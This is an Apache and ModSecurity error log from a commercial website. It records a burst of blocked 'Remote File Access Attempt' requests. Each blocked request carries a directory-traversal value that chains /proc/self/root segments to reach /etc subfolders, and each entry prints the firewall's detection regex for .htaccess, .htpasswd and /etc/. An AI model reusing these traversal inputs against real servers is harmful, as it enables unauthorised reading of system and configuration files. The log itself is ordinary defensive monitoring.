[Fri Mar 20 12:37:18.259144 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.241.31:46838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1prrninkcc-iUj5AqWgwAAA4E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:22.151294 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:38012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1psrninkcc-iUj5AqWiQAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:37:23.229053 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:46838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ps7ninkcc-iUj5AqWigAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:24.694278 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:58134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ptF1pVZ5mVmJwsFNp9wAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:24.926708 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:46480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ptNa6ubjKNq_cu4YZhAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:26.240581 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:46492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ptgF0L0L-SsrnPo6jXQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:37:28.677282 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:58136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1puNa6ubjKNq_cu4YZkAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:30.111091 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:46726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1puvXLqtnMIWvjpaLZFgAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:30.445497 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:46508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1puvHIg5MgXLBnicMvzwAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:37:31.461148 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:46730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pu_HIg5MgXLBnicMv0AAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:31.771275 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:59204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1puzJ3M9BSuKP7CAZmYAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:32.905289 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:46738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pvBCii7xarUs8iHamwwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:34.215153 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.241.31:46744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pvvXLqtnMIWvjpaLZGwAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:34.923280 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:59218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pvhCii7xarUs8iHamyAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:37:36.655398 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.241.31:46754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pwPHIg5MgXLBnicMv1wAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:37.479657 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:59230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pweoXxyEfFpUF8f-7RgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:37:39.116166 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:46140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pwxCii7xarUs8iHamzQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:40.063097 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.49:38728] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pxOoXxyEfFpUF8f-7SAAAAUw"]
[Fri Mar 20 12:37:41.474067 2026] [mime_magic:error] [pid 26799:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:38832] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:37:41.507149 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:59246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pxda6ubjKNq_cu4YZpwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:42.491332 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.241.31:46142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pxvHIg5MgXLBnicMv3wAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:48.516892 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:46148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pyda6ubjKNq_cu4YZrAAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:50.711911 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:56654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] 